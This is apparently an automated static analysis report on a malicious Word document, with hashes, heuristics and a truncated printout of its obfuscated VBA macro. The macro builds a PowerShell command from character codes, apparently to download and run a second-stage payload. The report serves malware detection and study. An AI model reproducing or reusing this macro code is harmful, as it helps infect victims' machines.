Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 17af88154f827e97…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 98.5 KB
Created: 2018-06-13 17:10:00
Authoring application: Microsoft Office Word
First seen: 2018-11-05
MD5: 7a6d63aa149799e4ae2fdda3f4bde03a
SHA-1: 8eda3524abba979e302022dbc32a2a179cceea1c
SHA-256: 17af88154f827e973a853041d0eb5f953924fe97b1c10b517d6e41bc9c4b4abc
Risk Score: 62

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic)

The sample is an OLE document with a significant amount of slack space and detected VBA macros. The VBA macro builds a string from concatenated fragments and numeric character codes, a common technique for obfuscating malicious commands or URLs. The constructed string 'HeLL ( [cHA' is likely the beginning of a command or URL used to download and execute a second-stage payload.

Heuristics (3)

  • OLE document has large unaccounted-for region (severity: high, rule: OLE_SLACK_ANOMALY)
    OLE file is 100,864 bytes but its declared streams total only 35,549 bytes; the remaining 65,315 bytes (65%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   11835 bytes
SHA-256: f1a3432dbf04ed24f2faedab2f2cb0f5feed5ac0c72ddaa7942f0a3e07aa8b41

Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "EndRLrICqC"
Function boCvXzpW()
On Error Resume Next
FfbjDv = Tan(3805)
Buaas = CDbl(khbiL)
qXIhk = Tan(68505)
ztIqj = CDbl(fwwuki * CDbl(wsRBSN + Int(IFSiz * Rnd(57503)) * zXTjzU * Log(51840 * mTtUV - wkEJi + Fix(51))))
jzuMGn = ZjDwH
JOqGzI = shKUOY
VSJpSnzNkz = "HeLL  ( [cHA" + "R[]](4 ,73" + " ,104 ,86,116,7" + "3 , 0,29" + " ,0" + " ,78 , 69 ,87 " + ", 13,79,6" + "6,74 ,69 ,67"
NzZPl = Tan(96289)
fBfLT = CDbl(HRDji)
zsWXwj = Tan(20353)
XYBzRL = CDbl(mrWra * CDbl(BirlI + Int(tNVtp * Rnd(61021)) * DHjHsn * Log(26504 * BqMzH - MLYth + Fix(51))))
QZLLt = OkoWG
NqAnf = AIjCzA
lFbYJnqHX = " ," + " 84 ,0 , " + "82,65 " + ", 78 ,68" + " ,7" + "9 ,77,27 " + ",4, 80," + "107 ,68," + " 75,101, "
vuLlL = Tan(16881)
KIrGM = CDbl(Oquiu)
FAOPN = Tan(92305)
OdXJsi = CDbl(NfCjdE * CDbl(DYdwjr + Int(SbMAAc * Rnd(59733)) * RLmuJ * Log(72002 * YkSDUv - aUMvjz + Fix(51))))
cApzL = jjwuH
YztdcX = mAsoFw
MEauIH = "66 ,0 , " + "29, 0 , 78 " + ",69 , " + "87, 13 ,79 ,6" + "6 , 74,69 ,67" + " , 84, 0,115 , " + "89 ," + " 83 ,84, 69, 77" + ", 1"
zLKXiw = Tan(79697)
vWFdo = CDbl(kAIjAU)
EDZCi = Tan(52277)
HMXls = CDbl(JBSTlJ * CDbl(KCfWEw + Int(wmQBf * Rnd(29433)) * UQSKFJ * Log(19326 * znmmPf - vIqndb + Fix(51))))
NcbzHm = jadAm
DsjRj = WqHLs
WiMJCrbEs = "4 ,110,69 ,84," + " 14,119, 69" + " ," + " 6" + "6 ,99, 76, " + "73" + ",69 , 78,84," + "27 ,4 , 73," + "66 , 7" + "9, 86 ,65 , 8"
QEMOlD = Tan(50866)
kQwLc = CDbl(ifJHO)
JchMX = Tan(8205)
LLTHT = CDbl(EinKN * CDbl(XkYlXc + Int(lCAaDJ * Rnd(15640)) * hvHBFc * Log(20565 * BudjPi - PGTRDG + Fix(51))))
TDRjIa = pvzKmJ
qXrtt = HNlUj
NltOwKzLjz = "4, 0, 29 ,0 , 7" + ",72 ,84, 84, " + "80, 26 ,15 ," + " 15 , 8" + "7, " + "87, 87 , 14," + "77, 85 ,"
EbPmfU = Tan(87172)
kGmDUT = CDbl(PkXtJQ)
lwJiI = Tan(97616)
CqPtR = CDbl(nCQrZQ * CDbl(GGBHwA + Int(NJGIHN * Rnd(27919)) * XAHCX * Log(44855 * NMVUwj - oPIzwY + Fix(51))))
GiQdf = mGFjz
plbDIW = qzHQp
FjYTcszV = " 83,65 ,83" + ", 72 ,73 , 83 " + ",72 , 73, 78" + ", 74 ,7" + "9 ,13 , 83,72" + " ,73,75 ,65 " + ", 14,67 , 79"
boCvXzpW = VSJpSnzNkz + lFbYJnqHX + MEauIH + WiMJCrbEs + NltOwKzLjz + FjYTcszV
End Function
Function PaPPH()
On Error Resume Next
mCzTO = Tan(47239)
MJXDD = CDbl(bisdJ)
MshbC = Tan(76791)
ZwMii = CDbl(cXtGfm * CDbl(RsNmDi + Int(TPjCKb * Rnd(92307)) * vLOBd * Log(65888 * qpPoPw - jzDizv + Fix(51))))
cFiRcM = ZflFn
oCXXPP = tjkzjd
OAbwSjjJw = ", 77 ,15 " + ", 87 ," + " 80" + " ,15,8" + "7 , 80 ,"
qjSha = Tan(51112)
Amswpo = CDbl(Fzwwk)
JEHlw = Tan(41965)
RoVSM = CDbl(ucbKr * CDbl(CarPK + Int(jBUYs * Rnd(61013)) * CJufda * Log(22431 * tZvzOO - ArBVz + Fix(51))))
TdfrlM = wAHZUB
zJAwRw = WBdXWf
YCwiwIClPkw = " 13, 67 ,79,78" + ",84, 69,78 " + ",84 ,15, 84 " + ",72 , 69" + " ," + "77" + " ,69,83 ,15, 7" + "3, 75, 116," + " 121, 90, 106,1" + "5 ,96 ,72 ,84"
sEnuh = Tan(8290)
rzkNJ = CDbl(vwwZBn)
CnGosm = Tan(10131)
NADKT = CDbl(jOwIV * CDbl(JXQAL + Int(RfFWB * Rnd(37307)) * KWkPBj * Log(38116 * MDsAca - XLdzLZ + Fix(51))))
bHhwHZ = HAuDl
TYzicj = usCHX
TwiDBwjT = " ,84, " + "80 ,26 , 15," + "15, 17 " + ", 24 " + ",21,14 , " + "18 , 24,"
TwJMr = Tan(64779)
AckYmE = CDbl(RmnUf)
sdXwr = Tan(81784)
zjPHFP = CDbl(zTzwc * CDbl(wKwpki + Int(GzHii * Rnd(36678)) * jfhLc * Log(94279 * MjhBHb - jiMwna + Fix(51))))
wLtQPQ = cMjZK
jbRnc = oXVvi
GQsnSvAnHqX = "14 ,18 , 18 " + ", 14 ,17,19" + ", 17," + "15,23" + " ,"
sroBJP = Tan(70440)
tiZNz = CDbl(ZLAXBB)
tAaJbA = Tan(27620)
HWkRMj = CDbl(kCHfh * CDbl(cuNhQ + Int(YjZzXT * Rnd(40545)) * IkiGd * Log(42625 * nVGWp - vzEwh + Fix(51))))
GMHwd = WJRrY
zpYGK = DdjUzq
nMSOiB = " 72, 1" + "09 , 1" + "08 , 1" + "10 ," + "84,25,22 , 7" + "0 "
bJhbDF = Tan(29323)
AsaLb = CDbl(ojvIdY)
XVWhkG = Tan(48815)
wLCCR = CDbl(LXJNZ * CDbl(DQPdZ + Int(vmpkj * Rnd(53417)) * ldCtk * Log(76016 * Kiiwf - ljEwC + Fix(51))))
MFwtZ = Ajzhwf
WMZlR = AiPiqh
NhbsvlPFpkj = ", 15,96 ,72 ,8" + "4 , 84" + ",80,26 ," + "15 , 1" + "5,87, 87 ,87 ,"
EsOwSn = Tan(21880)
NbdYPH = CDbl(FXOaK)
oolFiR = Tan(36363)
IwwTI = CDbl(fkKji *
... (truncated)